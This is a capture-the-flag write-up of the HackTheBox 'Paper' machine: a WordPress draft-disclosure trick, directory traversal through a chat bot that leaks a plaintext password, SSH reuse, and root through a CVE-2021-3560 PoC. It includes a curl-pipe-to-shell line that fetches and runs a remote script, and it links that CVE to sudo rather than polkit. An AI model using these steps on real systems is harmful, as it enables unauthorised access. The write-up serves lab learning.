HackTheBox: Paper

2 minute read

Throughout this writeup, I will reference the machine IP address as 10.10.11.143.

Scanning & Enumeration

Network Scan

I started with a network scan using nmap: nmap -sC -sV 10.10.11.143. The open ports are 22(ssh), 80(http), and 443(https).

Web Scan

I browsed to 10.10.11.143:80, but it was the default CentOS installation page. I then ran feroxbuster to try and find any other directories or files, but there was nothing interesting. I then tried Nikto, with nikto -host http://10.10.11.143 and noticed an interesting result:

1Uncommon header 'x-backend-server' found, with contents: office.paper

I added office.paper into my /etc/hosts

110.10.11.143    office.paper

This allowed me to browse to http://office.paper, which is a WordPress website. There’s an interesting post where Nick mentions “secret content” in the drafts.

Vulnerability Analysis

WordPress has a vulnerability in versions <= 5.2.3, which allows “unauthenticated view private/draft posts”. The POC is extremely simple, you just append static=1&orderBy=asc to URL, like this: http://office.paper/?static=1&orderBy=asc.

img

We were able to view the drafts, and we can notice the “Secret Registration URL”. All we need to do is add that to /etc/hosts as well:

110.10.11.143    office.paper
210.10.11.143    chat.office.paper

Browsing to the secret registration URL shows it is hosting Rocket.Chat. We can fill out the registration form to gain access to the application. There is only one channel available, #general which is read-only for our account. There is also a Bot account named recyclops, which features a couple of commands: file <name> and list <dir>. Since we cannot send a message in general, we can direct message recyclops.

img

So we have directory traversal. However, we aren’t able to access user.txt right-away because it is owned by dwight. Maybe we can analyze the bot?

Exploitation

We can list ../hubot and there’s all the source code to the recyclops bot. However, one interesting file is file ../hubot/.env, which contains:

 1<!=====Contents of file ../hubot/.env=====>
 2export ROCKETCHAT_URL='http://127.0.0.1:48320'
 3export ROCKETCHAT_USER=recyclops
 4export ROCKETCHAT_PASSWORD=Queenofblad3s!23
 5export ROCKETCHAT_USESSL=false
 6export RESPOND_TO_DM=true
 7export RESPOND_TO_EDITED=true
 8export PORT=8000
 9export BIND_ADDRESS=127.0.0.1
10<!=====End of file ../hubot/.env=====>

Trying to login to the reclyclops account on Rocket.Chat errors, however, we have a password and we know that Dwight created the bot. Let’s try to SSH into Dwight with the password found from Hubot: ssh [email protected] and just like that, the user is pwned.

Privilege Escalation

We can run the handy-dandy LinPEAS to find privilege escalation vectors. All we need to do is download it via curl.

1curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

One of the first alerts we get is that the sudo version is 1.8.29, which is vulnerable to CVE-2021-3560. There is a POC for this CVE, found here. We just need to curl the poc.sh and run it passing our own username and password.

1./poc.sh -u=test -p=test
2su - test
3sudo bash